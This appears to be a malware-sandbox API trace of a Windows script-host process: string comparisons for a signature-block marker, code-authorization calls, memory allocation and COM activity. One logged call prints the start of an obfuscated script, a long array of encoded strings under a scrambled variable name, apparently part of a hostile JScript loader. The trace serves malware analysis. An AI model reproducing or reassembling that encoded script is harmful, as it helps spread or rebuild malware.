	[0143.926] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.926] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.926] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.926] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.926] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.926] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0143.926] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.926] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0143.926] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0143.926] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0143.926] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.926] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0143.926] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0143.926] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.926] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.926] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0143.926] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0143.926] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0143.926] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0143.926] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0143.926] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.926] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.926] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0143.926] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.926] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.926] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0143.926] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.926] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0143.926] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0143.927] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0143.927] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0143.932] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0143.932] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.932] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.932] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0143.932] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0143.932] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0143.932] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0143.932] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.934] SetLastError (dwErrCode=0xb) 
	[0143.934] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0143.935] CloseCodeAuthzLevel () returned 0x1
	[0143.935] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0143.935] ??2@YAPEAX_K@Z () returned 0x4ff3f0
	[0143.935] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0143.935] GetProcessHeap () returned 0x500000
	[0143.935] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x538430, Size=0x11238) returned 0x56ae20
	[0143.936] ??2@YAPEAX_K@Z () returned 0x4ff480
	[0143.936] GetCurrentThreadId () returned 0xd54
	[0143.936] realloc (_Block=0x0, _Size=0xc8) returned 0x4ff4e0
	[0143.937] ??2@YAPEAX_K@Z () returned 0x4ff5b0
	[0143.937] malloc (_Size=0x1008) returned 0x4f9f30
	[0143.937] ??2@YAPEAX_K@Z () returned 0x4ff5f0
	[0143.937] malloc (_Size=0x108) returned 0x4f7d80
	[0143.937] malloc (_Size=0x208) returned 0x4ff7a0
	[0143.938] malloc (_Size=0x200) returned 0x4ff9b0
	[0143.938] malloc (_Size=0x408) returned 0x4ffbc0
	[0143.938] malloc (_Size=0x2008) returned 0x4faf40
	[0143.938] malloc (_Size=0x808) returned 0x4fcf50
	[0143.939] malloc (_Size=0x1008) returned 0x4fd760
	[0143.939] malloc (_Size=0x4008) returned 0xbdfd0
	[0143.940] malloc (_Size=0x2008) returned 0xc1fe0
	[0143.942] malloc (_Size=0x4008) returned 0xc3ff0
	[0143.949] free (_Block=0x4ff4e0) 
	[0143.949] ??2@YAPEAX_K@Z () returned 0x4ff4e0
	[0143.949] CoGetObjectContext (in: riid=0x7feddfd6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31e8c8 | out: ppv=0x31e8c8*=0x51f420) returned 0x0
	[0144.148] ??2@YAPEAX_K@Z () returned 0x4ff560
	[0144.149] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x4ff560, riid=0x7feddfd6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x4ff598 | out: pdwCookie=0x4ff598*=0x100) returned 0x0
	[0144.149] IUnknown:AddRef (This=0x51f420) returned 0x2
	[0144.149] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.149] ??2@YAPEAX_K@Z () returned 0xffe90
	[0144.149] ??2@YAPEAX_K@Z () returned 0x4ff940
	[0144.150] CoGetObjectContext (in: riid=0x7feddfd6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31e918 | out: ppv=0x31e918*=0x51f420) returned 0x0
	[0144.150] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.150] ??2@YAPEAX_K@Z () returned 0x4ffa00
	[0144.150] ISystemDebugEventFire:IsActive (This=0x5375b0) returned 0x1
	[0144.150] CoGetObjectContext (in: riid=0x7feddfd6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31e8b8 | out: ppv=0x31e8b8*=0x51f420) returned 0x0
	[0144.150] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.151] malloc (_Size=0x2e48) returned 0x4f9f30
	[0144.151] GetCurrentThreadId () returned 0xd54
	[0144.151] ??2@YAPEAX_K@Z () returned 0x4ffae0
	[0144.158] ??2@YAPEAX_K@Z () returned 0x102d50
	[0144.160] ??2@YAPEAX_K@Z () returned 0xc0af0
	[0144.164] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.164] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.164] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] free (_Block=0xc1c70) 
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] free (_Block=0x4fea80) 
	[0144.165] free (_Block=0xc0930) 
	[0144.165] free (_Block=0x4f83e0) 
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] free (_Block=0xc1e20) 
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] free (_Block=0x4fffb0) 
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] free (_Block=0x101140) 
	[0144.165] free (_Block=0x4f7d80) 
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.165] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0144.166] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0144.166] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.166] GetTickCount () returned 0x34394
	[0144.166] ??2@YAPEAX_K@Z () returned 0xc6560
	[0144.166] ??2@YAPEAX_K@Z () returned 0xc6590
	[0144.167] ??2@YAPEAX_K@Z () returned 0xc65c0
	[0144.167] ??2@YAPEAX_K@Z () returned 0xc65f0
	[0144.168] ??2@YAPEAX_K@Z () returned 0xc6620
	[0144.168] ??2@YAPEAX_K@Z () returned 0xc6650
	[0144.169] ??2@YAPEAX_K@Z () returned 0xc6680
	[0144.169] ??2@YAPEAX_K@Z () returned 0xc66b0
	[0144.169] ??2@YAPEAX_K@Z () returned 0xc66e0
	[0144.170] ??2@YAPEAX_K@Z () returned 0xc6710
	[0144.170] ??2@YAPEAX_K@Z () returned 0xc6740
	[0144.171] ??2@YAPEAX_K@Z () returned 0xc6770
	[0144.171] ??2@YAPEAX_K@Z () returned 0xc67a0
	[0144.175] ??3@YAXPEAX@Z () returned 0x1
	[0144.175] ??3@YAXPEAX@Z () returned 0xb00500001
	[0144.175] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0144.175] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0144.175] ??3@YAXPEAX@Z () returned 0xe00470001
	[0144.175] ??3@YAXPEAX@Z () returned 0xf00440001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1000410001
	[0144.175] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0144.175] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1300380001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1400350001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1500320001
	[0144.175] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0144.175] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1800290001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1900260001
	[0144.175] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0144.176] ??3@YAXPEAX@Z () returned 0x2000110001
	[0144.176] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x1
	[0144.176] ??3@YAXPEAX@Z () returned 0x200200001
	[0144.176] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0144.176] ??3@YAXPEAX@Z () returned 0x500170001
	[0144.176] ??3@YAXPEAX@Z () returned 0x2300080001
	[0144.177] ??3@YAXPEAX@Z () returned 0x600140001
	[0144.177] ??3@YAXPEAX@Z () returned 0x700110001
	[0144.177] ??3@YAXPEAX@Z () returned 0x2400050001
	[0144.177] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0144.177] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0144.177] ??3@YAXPEAX@Z () returned 0xa00080001
	[0144.177] ??3@YAXPEAX@Z () returned 0xb00050001
	[0144.177] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0144.178] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0144.178] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.178] GetTickCount () returned 0x343a4
	[0144.179] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0144.179] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.179] GetTickCount () returned 0x343a4
	[0144.180] realloc (_Block=0x0, _Size=0xc8) returned 0xc4520
	[0144.726] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0144.726] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.726] GetTickCount () returned 0x345c6
	[0144.728] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0144.728] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.728] GetTickCount () returned 0x345c6
	[0144.729] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0144.729] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.729] GetTickCount () returned 0x345c6
	[0144.733] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0144.733] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.733] GetTickCount () returned 0x345c6
	[0144.737] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0144.737] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.737] GetTickCount () returned 0x345c6
	[0144.738] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0144.832] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.832] GetTickCount () returned 0x34633
	[0144.833] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0144.833] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.833] GetTickCount () returned 0x34633
	[0144.835] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0144.835] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.835] GetTickCount () returned 0x34633
	[0144.836] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0144.836] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.836] GetTickCount () returned 0x34633
	[0144.837] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0144.837] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.837] GetTickCount () returned 0x34633
	[0144.839] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0144.839] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.839] GetTickCount () returned 0x34633
	[0144.841] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0144.841] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.841] GetTickCount () returned 0x34633
	[0144.842] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0144.842] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.842] GetTickCount () returned 0x34633
	[0144.843] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0144.843] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.843] GetTickCount () returned 0x34633
	[0144.845] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0144.845] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.845] GetTickCount () returned 0x34633
	[0144.846] FindResourceA (hModule=0x7feddf30000, lpName=0x139, lpType=0x6) returned 0x4b07f8
	[0144.846] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b07f8) returned 0x4b1d44
	[0144.846] LockResource (hResData=0x4b1d44) returned 0x4b1d44
	[0144.847] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b07f8) returned 0x15c
	[0144.847] FreeResource (hResData=0x4b1d44) returned 0
	[0144.847] FindResourceA (hModule=0x7feddf30000, lpName=0x101, lpType=0x6) returned 0x4b07e8
	[0144.847] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0x4b1c74
	[0144.847] LockResource (hResData=0x4b1c74) returned 0x4b1c74
	[0144.847] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0xce
	[0144.848] FreeResource (hResData=0x4b1c74) returned 0
	[0144.848] bsearch (_Key=0x31cb58, _Base=0x7feddffa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7feddf881a0) returned 0x7feddffa5a8
	[0144.849] ??2@YAPEAX_K@Z () returned 0x100a20
	[0144.850] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0144.850] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.850] GetTickCount () returned 0x34642
	[0144.853] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0144.853] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.853] GetTickCount () returned 0x34642
	[0144.854] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0144.854] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.854] GetTickCount () returned 0x34642
	[0144.855] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0144.855] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.855] GetTickCount () returned 0x34642
